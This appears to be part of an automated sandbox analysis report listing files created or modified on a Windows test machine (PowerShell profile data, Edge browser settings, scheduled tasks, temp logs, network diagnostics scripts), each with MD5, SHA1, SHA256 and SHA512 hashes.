| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 71c4b1323b5c2b0b3dce79a418170c57 |
| SHA1 | f2484755165cc812bd2017c3ff93d7aef8e9f642 |
| SHA256 | b7151a59702581451ad3accb25d5aa7889a4d385142568331f42b0fcc2019872 |
| SHA512 | 9048311d8ca08c33c090038fce1b5f28d22e1b9b0c1a6bb27f97619c778e2d474a3f10ab92c76bd487b94e059b5d066d1d960eec15b6a3a74355099494172e51 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a2a3e713b8102a049e33bcd4fee0e4d6 |
| SHA1 | 744cd284be9388f9520a3f4701d23bc9ddcb0146 |
| SHA256 | 195332abc0ac61ad5a80f4afad532924270e08ecff0b889c39b8d1c87475ac90 |
| SHA512 | 41d911e6a4010f34927971f61c4ced3c91388408867367ce35d2e2cf687592f68909704d5ad07c73c95fcfb8cfc5eab0e84e8b3033fc2b1411b2cb6b17ab5c9e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | d84f682c536219c60b20ca215d3e8495 |
| SHA1 | fa7626f812b4f5998713ba2aa4aba0b748493818 |
| SHA256 | 750b2c6291f33326f332f876eadf9ae400a51a0445d294896781391328d6b9fa |
| SHA512 | 76d3e0e886a2afd0d634f66130020dd4cf16ddd8becac2807e37e1b6882c72173d31ef215cd5d5256933ed585cfa20e5178c78f50437b2cee3809904b7b71cba |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0b9413c83e56e3c23e204843dce03482 |
| SHA1 | 56b4bb587536ec43ccf5d1a1dc549a1008890a0c |
| SHA256 | 78d3158c6a79639b012ef7851b46489a4c020e971482a7be198ec74e63a9a281 |
| SHA512 | 350a951d8413d0d654240a85b561087b10c5aa47c8a2351c8dba3ddb9e9ec3b33a1aace1386983fc0f6730a78028ac2482de1c56fd1c5f4bdfc6bf1d7d08df92 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 1e8e2076314d54dd72e7ee09ff8a52ab |
| SHA1 | 5fd0a67671430f66237f483eef39ff599b892272 |
| SHA256 | 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f |
| SHA512 | 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 0b990e24f1e839462c0ac35fef1d119e |
| SHA1 | 9e17905f8f68f9ce0a2024d57b537aa8b39c6708 |
| SHA256 | a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a |
| SHA512 | c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | ceb7caa4e9c4b8d760dbf7e9e5ca44c5 |
| SHA1 | a3879621f9493414d497ea6d70fbf17e283d5c08 |
| SHA256 | 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9 |
| SHA512 | 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | 7d612892b20e70250dbd00d0cdd4f09b |
| SHA1 | 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5 |
| SHA256 | 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02 |
| SHA512 | f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
| MD5 | 8abf2d6067c6f3191a015f84aa9b6efe |
| SHA1 | 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7 |
| SHA256 | ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea |
| SHA512 | c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
| MD5 | f313c5b4f95605026428425586317353 |
| SHA1 | 06be66fa06e1cffc54459c38d3d258f46669d01a |
| SHA256 | 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b |
| SHA512 | b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 59c7f92111cb0ed9f61807ad8fb69201 |
| SHA1 | 012a06dd89a0098cb073339865a31f378d1758b8 |
| SHA256 | d5bc36c8062e07c33224b0d332303c430edce4efff9423278766fe68a45003bd |
| SHA512 | cce71225de2f41fb2202449898e3a61d29ba674603813b5aef09c8bb9f904efa1434bcd9965078448b78e94acf7735bae0f345c5dfacff6f27257d60c34c64c7 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 9042b277c61a53ff2a33a1c912284a6a |
| SHA1 | 0212cd7f802081b79ffda2150c074da22f17471f |
| SHA256 | 1e0431d52511ec083b0e21858f989d8622bd324321cc14c97152cc34731fb7c3 |
| SHA512 | 7e3db95bb41e2240b73aacb18996e3ec654a7a5b3a8a1e866215652fdc229552b8c6493d65f77e0d48900d7c14c01bf1d2d55ad7662ef6d417b7d52fed4307b1 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 41f01682bc2908a8ce161b6246da5639 |
| SHA1 | 9be8f8c21d2478e90115baaa692d6151dcc23718 |
| SHA256 | 5e0f66d762201a494e811400801fe266186a27628f65f83e44c1bcbfdf34661c |
| SHA512 | 88ad5601291e4f917e7fec5f08218eaac9a53bb1aa9566a1b3a9aa01a714cc68b91d79ab01a07cd1a31b747390703211b29ff910e1b3a5f1094c1af0b3d35e13 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 58b5892e88a79021b5a3cb67628274a6 |
| SHA1 | 24525deda7f2f67375e2398ff11600285dbcfbf6 |
| SHA256 | 92c2d3506079a411774b46a3884b1701ee6eca86150df379fd24121095b3033d |
| SHA512 | fc5be508111d35234e89f5204b386cb6ff0ceaaf1a275955a8a3ff9e1e77963875f247632a002d0ae8e71d899f01c074db4f308d71b77f396fd67b258e079741 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | fbf7ea4d37e806d4715d00f163a5f51c |
| SHA1 | 7f25bdfc8896bfbcd752264a03a67f3c5727f8bd |
| SHA256 | e21c5fa361c5353b3e5f4e56b389a094bbd577bc3a3745e4a150d07f3efa2210 |
| SHA512 | 4879988db14df5474b37f5f23b2c758e2c5a0cb6223a6951ccf8fb0d38fbd5e57c7982963e6f3979b46097dc9c5876f38cd2821f72060aeb94a8f53945212aef |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 7c868fd556f6cdfaf9ccee6bbe6a1c9e |
| SHA1 | ac23dd52faea0d97c6ea727f8ca896f456722a39 |
| SHA256 | 863017562cb081b8d1f69c05ded1df3b4c9d0e2c391a90162b730347b1124001 |
| SHA512 | 10764f83320fbeeef5fe5e77355c4380dda86c5b102622b64d386fdd211c54b6043eda832496e577f832237b8defb0271da671207024889d49f71a40521776cd |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 7fcd8a23617cdee8cf4d1597f91e53b2 |
| SHA1 | eae7baeb0bd5dabbea13e2a9048dc56c9b8f11bd |
| SHA256 | 62fc3d66c994983cebd413784dcb859a79b89a66e67ea2260ea9afc2434f06df |
| SHA512 | b03045688f41550fe6f802beb22d62f50641aa32276796f639e0a0876c5770034fe580a184961f624e30719f7b91f8c8a27279fb44cb3b914a12f43cc0d566cc |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | d6287061cc091a7f4906611a175eac9d |
| SHA1 | 3c23cf12f57aebce123d1b6cf89dea3fb3f74b21 |
| SHA256 | cecd1db0a4fd12e6da6776882860c254e8bddf3fc5fd802547ff99baac438fea |
| SHA512 | e83a732e0583ee71c0b9a54706c90383ad8c94223811263e05273d235e5659e4df47e284dc13af692462899f577b4591b75ebbc66379b0ea89d03990498b3098 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 73828ea24989867e340a28f70bc0c017 |
| SHA1 | 8233b94ec65ad008ca61a743212c36294ec5902e |
| SHA256 | 7122e80459009a96b01d3d73194d4ef244b5d10872c821dadf152d8dcc522b06 |
| SHA512 | cda4f8d81dd1811453c94e71d96ac2d79941b141ee4bb1d8de82eca9d7535f2da0168bb603188611732f1aa9f5b8731b97f6d4d087968cf596d12f1ac2842581 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | ee7322fcbf96be5b2d33f28d3d915a47 |
| SHA1 | 31cc4c16e197414434b2624ea4d9f961e8f43c23 |
| SHA256 | c6cceaf1c7a00e40efa9d62cc6ab84afe6ba7e4945e2fc79a0c3a250b6a686de |
| SHA512 | 76d5e2e7d072353957bc0f0530a5eae38e82be90824b6c55d30a38e98b93f741ed1e0aff7ca1b8157b6f9c7c62398ba562b86d910f70914ff2492a2512b73b9d |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | f74d89d536e8a2ae426c45a2f3fd0a2b |
| SHA1 | 1dc517678defae8318f216de46e6809617cc5d25 |
| SHA256 | 7d1591b797b62567b88bdaba2a7de55c53742887fbdc9e3aa35c295cb1152431 |
| SHA512 | 5fd3c62f1dc19709b467e7873a693475e3b7430490da74d99099e9f72af3a3f51e4b291da7cb97fa51089a5bc4ef47fa5adfce33ca995b4db378dbe568e2cce9 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | d78d8756f34b60410512ce9db98f9c7c |
| SHA1 | c3edd333e2b0f09410af79c947c7b835586d47f0 |
| SHA256 | efbfada0a598476ca831cfe468a5a014ab95826926ea75481d36eedb5b0d3b46 |
| SHA512 | 78b3edad5034e1df08ddf3056407aaab6c6b75320d266e7e92a9186c5fbbc4b155723045d92dd15001375030c91bdf0058843f696dfb7ebfb355985bc6b57bda |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 3bc1b30ea8c274aeea80426314d65e31 |
| SHA1 | 143bd8b11705ba23d42ddb1240f0814404a010c2 |
| SHA256 | ae924a80fce21f9e3c7fd33372b18707f8c590ada8672f1a2ba3be573eb8008b |
| SHA512 | 35088f92c94c85555b88b834ec24fa5e185f24e722a1c4af7621c98d8191e68787396cffbf96e4cea41758fe5ea6f9b3024a5f71b8d45aa4b9093b90d58336d8 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 9e7626e66af50dedc18aa0e54a06c7fc |
| SHA1 | f1ce29d2b1aa1e96b57d5fc166e74b7228eb17ba |
| SHA256 | ceedfa84b848fccc3cbcfa09f0db4ac742747cc56b34aad6d999a0d6df78545b |
| SHA512 | 0d4dfb6bba928b9c84c38f2cc6e0ea0ba033e4ca98a8c52408757e661c810e774c059127742400b362c29dce34b4e0563dd212a846d22dde762c1d9ece704501 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | b6c18bbe93453c0b7a677ad0c2c04afa |
| SHA1 | aa07a6b4ce6ef0f6d149729c978a1493e0f5c3ac |
| SHA256 | 697f8e7ae712731587c97ba88f8de5b0d64e3c737a68b4c31ee89f70bec6dd40 |
| SHA512 | 9ed807f6842d1a19b3c88d8b01b201a14fd9dd1be18055ea04d7a7224f5e630791d9210ba133aed1a45c44b6cbc7b0ca56d991938b2c16da821bf8b71ce46ebe |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | c6af1d6674f7f1da617737000549e4a1 |
| SHA1 | bb6f871f2a32f5ced7ea3ab01c0dc3baa44613d9 |
| SHA256 | 076b4c4c69d1ed14f2ad63fe8310bb1d0ab0a892c3e6d49f29ef973aa336c4f0 |
| SHA512 | 41d41e4f640c13fce3b20f8677604c279e1956e9ef0a7cd0ffc0f1a2a958784d1902dd9e3c5adade1fabcb5870b480b0474a05d752f43db3fd3970c924484d00 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | dbdcb0970437c0f8c1c323629042c834 |
| SHA1 | 8b9b67857faac0002119cc73f4acb080e1bc0234 |
| SHA256 | 8335a76d2c2f08188251ef5847d5746607cea085d70724a6e295d5573cae7b7b |
| SHA512 | 0533142a4e58023ced4222c752e87263b7946a4f235523e648556ad92123957edc23406e8ab4d5a4711813f9bd373126b414a8c3bd40cd554a0513228665fba3 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 9a0916ade2f9a068803a48288b09171b |
| SHA1 | 80d9a010a5638ce00db38f8b877a26b48c2ee146 |
| SHA256 | 858d1b6c253e13e864b1a5d335ddcb2c101b1970272010c977556e55d044af07 |
| SHA512 | 1082460c2305a157e9215aae71968a40b9c13a547e71cdae98b829aed5457278ff939ad4a920bffa77ac7f262c7dc849b6e26ed48741d542fee71c017db0f857 |
C:\Users\Admin\AppData\Local\Temp\NDFFDA9.tmp
| MD5 | 7af2f1a5ffb42f118679c7249e931c88 |
| SHA1 | f837dae90ae7d7a9257230a7d98739619e1dda18 |
| SHA256 | 70ffa89e0af89bf86cccc17d50dc9659694f5ed0b27b78a04a3275a1bc41c8d0 |
| SHA512 | a2df0f344fb8f7e2bf50db07302e619fdb9f2d2d8a5f170110c774643a6e9ebc5ec1d4d4f68cd2872599b00167b261a4fe458eaa7cef65502c6f0619cffb5007 |
C:\Windows\Temp\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\en-US\DiagPackage.dll.mui
| MD5 | 44c4385447d4fa46b407fc47c8a467d0 |
| SHA1 | 41e4e0e83b74943f5c41648f263b832419c05256 |
| SHA256 | 8be175e8fbdae0dade54830fece6c6980d1345dbeb4a06c07f7efdb1152743f4 |
| SHA512 | 191cd534e85323a4cd9649a1fc372312ed4a600f6252dffc4435793650f9dd40d0c0e615ba5eb9aa437a58af334146aac7c0ba08e0a1bf24ec4837a40f966005 |
C:\Windows\Temp\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\DiagPackage.dll
| MD5 | 580dc3658fa3fe42c41c99c52a9ce6b0 |
| SHA1 | 3c4be12c6e3679a6c2267f88363bbd0e6e00cac5 |
| SHA256 | 5b7aa413e4a64679c550c77e6599a1c940ee947cbdf77d310e142a07a237aad2 |
| SHA512 | 68c52cd7b762b8f5d2f546092ed9c4316924fa04bd3ab748ab99541a8b4e7d9aec70acf5c9594d1457ad3a2f207d0c189ec58421d4352ddbc7eae453324d13f2 |
C:\Windows\TEMP\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\NetworkDiagnosticsTroubleshoot.ps1
| MD5 | d0cfc204ca3968b891f7ce0dccfb2eda |
| SHA1 | 56dad1716554d8dc573d0ea391f808e7857b2206 |
| SHA256 | e3940266b4368c04333db89804246cb89bf2073626f22b8de72bea27c522282a |
| SHA512 | 4d2225b599ad8af8ba8516f12cfddca5ec0ce69c5c80b133a6a323e9aaf5e0312efbcfa54d2e4462a5095f9a7c42b9d5b39f3204e0be72c3b1992cf33b22087c |
C:\Windows\TEMP\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\UtilityFunctions.ps1
| MD5 | c912faa190464ce7dec867464c35a8dc |
| SHA1 | d1c6482dad37720db6bdc594c4757914d1b1dd70 |
| SHA256 | 3891846307aa9e83bca66b13198455af72af45bf721a2fbd41840d47e2a91201 |
| SHA512 | 5c34352d36459fd8fcda5b459a2e48601a033af31d802a90ed82c443a5a346b9480880d30c64db7ad0e4a8c35b98c98f69eceedad72f2a70d9c6cca74dce826a |
C:\Windows\TEMP\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\en-US\LocalizationData.psd1
| MD5 | 380768979618b7097b0476179ec494ed |
| SHA1 | af2a03a17c546e4eeb896b230e4f2a52720545ab |
| SHA256 | 0637af30fc3b3544b1f516f6196a8f821ffbfa5d36d65a8798aeeadbf2e8a7c2 |
| SHA512 | b9ef59e9bfdbd49052a4e754ead8cd54b77e79cc428e7aee2b80055ff5f0b038584af519bd2d66258cf3c01f8cc71384f6959ee32111eac4399c47e1c2352302 |
C:\Windows\TEMP\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\UtilitySetConstants.ps1
| MD5 | 0c75ae5e75c3e181d13768909c8240ba |
| SHA1 | 288403fc4bedaacebccf4f74d3073f082ef70eb9 |
| SHA256 | de5c231c645d3ae1e13694284997721509f5de64ee5c96c966cdfda9e294db3f |
| SHA512 | 8fc944515f41a837c61a6c4e5181ca273607a89e48fbf86cf8eb8db837aed095aa04fc3043029c3b5cb3710d59abfd86f086ac198200f634bfb1a5dd0823406b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | c9041f461132e93f594aef4c22567a01 |
| SHA1 | 5c6042634ac65fb3e81ff89c47ce2780ff56b476 |
| SHA256 | d3ec5c00bd2e9d999fa0264e53c52766614364a48c117bc9853889df6fb2019c |
| SHA512 | c597810c990114fca8d86d985db8e61c8562962cc7f0cd07a88f06aa9748569bce1f8db4ae45feeceef993706d2a13754c18200c774846f2cfaba18bd4eb6ee3 |
C:\Windows\TEMP\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\StartDPSService.ps1
| MD5 | a660422059d953c6d681b53a6977100e |
| SHA1 | 0c95dd05514d062354c0eecc9ae8d437123305bb |
| SHA256 | d19677234127c38a52aec23686775a8eb3f4e3a406f4a11804d97602d6c31813 |
| SHA512 | 26f8cf9ac95ff649ecc2ed349bc6c7c3a04b188594d5c3289af8f2768ab59672bc95ffefcc83ed3ffa44edd0afeb16a4c2490e633a89fce7965843674d94b523 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | af387375b6efd28eb75029d7643a863c |
| SHA1 | 79a190af5a93a43a898016decfdeeca4bc57ae4c |
| SHA256 | e2ae929ad7023da77c2d48274983b0d1ec3dcf9a7aa26f00fc0dbb97a1ed5945 |
| SHA512 | 2e323be26de02d52af8cda31cfa7356941f6c895edca5790ef26bd51f2716fdcb7fbe1096984854e18e3c3094e08bfecb6a1699e6645e33933a997fe012ed8fc |
C:\Windows\INF\netrasa.PNF
| MD5 | 9aeed08b53f9a8f037159d38c2d1b728 |
| SHA1 | 97104206b0daec8a86c5a042d589e24b0d430885 |
| SHA256 | 32a2f9372c269fa63ce4e19f02bf9d85ac4b3a6d96a8a944eece6a0bf46c3d0a |
| SHA512 | 16598a429371b647e1d84969b77ea14c125c3e70c101abfe5db83b0fea35da6b6d9ec4a1168ef78398a6a1e8b01a77858ea18df02203e34c3395b483066739bb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 4c2458dd89f8675a223101b66e73c97a |
| SHA1 | d22698525a982c04434316f8824f89f4f8fb3fbb |
| SHA256 | 4d427c92c9f59eb3457a94eca1cbbda4846e9751567848f03d0c1ca259e4aa3d |
| SHA512 | 44c098fbdff31525948865c4da0de6d067aa655d89eb17cf288f952e6e959697d22119d569d070f08824fd7f036e2613fe082dca7816b826051879edadce7b68 |
C:\Windows\Temp\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\result\E3E9C8CC-29C3-4744-B7AC-8F89D4A79EFC.Diagnose.Admin.0.etl
| MD5 | 23f309570819d38a14861b0cf24ec695 |
| SHA1 | 0786c999debaa417bc8dab63bf21edf818e7fc1d |
| SHA256 | 9f3889d8be19a7a6dda4030d2645a3ed0c66655849eba4e10a3ef9b2fbc00c6e |
| SHA512 | 4048ef8e7215a338389493ec06b108fc5935e4eecf56fe37b7c118293d9f8db072eaf1a030529563611d56d52e04dc50c4cdaea2d82c7e10bb3110a983b4068a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | f50a091b253172037dd77531196b8e6a |
| SHA1 | 7b7f973390d1ca3ab838fbadd952031b92cf2f2c |
| SHA256 | 518fbb4abc9695517fc23bc4e93b866318f41deef16b265c3d3d11e3a4855225 |
| SHA512 | 0f650bbaa413b1a4bed72de2420104e9d032e47bd3a06e8a7c9b93d24ff1770d1dd9775d09931410da99e6c77ec5c5f0982dec6fcbd77d4939f413aeee447856 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 09de602b16b6d8443257146db2bad1c9 |
| SHA1 | 5dad021072f29bd13813cd5c4bef698075439b8d |
| SHA256 | 74fa124e03d07ca98f9a33aba4728de18e1a8caa0460e07630e0830699406bb1 |
| SHA512 | c0866ba064c391584a68bb4ac1884793bd3e2da27203f8476bc760429796acb14f0cbc4ba2dcc50966dcec7968be16bdf3460edd83e784d6b15830e1ae687b6a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1
| MD5 | 7c73d321e34419e94ed77d0fd1b53ea8 |
| SHA1 | 7597770df1590bfb9b859b6c80a23141b56c4232 |
| SHA256 | 5afc5732b69b310dc0c16f7f94563fa8c02a9e8ee2bf19365c36d6f3a295b297 |
| SHA512 | af8517d5cd91052ba5ab8f3e2bb74a3b057e56dd694fca36850cb225a6e4d59e7c7bdbe16363db046dc2ce071f241a002bb85d3c7d553dfb43b58081eee149ba |
C:\Users\Admin\AppData\Local\ElevatedDiagnostics\460911090\2024062920.000\NetworkDiagnostics.debugreport.xml
| MD5 | 8ccea272ca15f9f95878b4a75e9a6ca9 |
| SHA1 | 939c71347274667685d2692481eb849547a21424 |
| SHA256 | 19973d08d57bdf922ff8d95778536c4623e86713585465286c9a643b9207a795 |
| SHA512 | 3b5680bc929c84a2f88ae2d9b29554abb53d362ac5d16b1f9af4636395ecef4e6b6594426e7484c938678bd6d054d3df40f574ffdb4f120f397c18be7c1db027 |
C:\Users\Admin\AppData\Local\ElevatedDiagnostics\460911090\2024062920.000\ResultReport.xml
| MD5 | 129d8019e720103ed877ac6ff04a4297 |
| SHA1 | f56ee8aead2c02c6350280c7e33340d186089b03 |
| SHA256 | b15c8229e97687c8682a9b8a924f233a1a8994cd41889102e321cf745524800c |
| SHA512 | 2a92f706166c4ee5ea1242aee505c1384440f3ad3a6cdd8403efaf245f0b9d63d074b27c4731055bf2201389fefea2d952aceaa6813959a5d52acba85352a34c |
C:\Users\Admin\AppData\Local\ElevatedDiagnostics\460911090\2024062920.000\results.xsl
| MD5 | 310e1da2344ba6ca96666fb639840ea9 |
| SHA1 | e8694edf9ee68782aa1de05470b884cc1a0e1ded |
| SHA256 | 67401342192babc27e62d4c1e0940409cc3f2bd28f77399e71d245eae8d3f63c |
| SHA512 | 62ab361ffea1f0b6ff1cc76c74b8e20c2499d72f3eb0c010d47dba7e6d723f9948dba3397ea26241a1a995cffce2a68cd0aaa1bb8d917dd8f4c8f3729fa6d244 |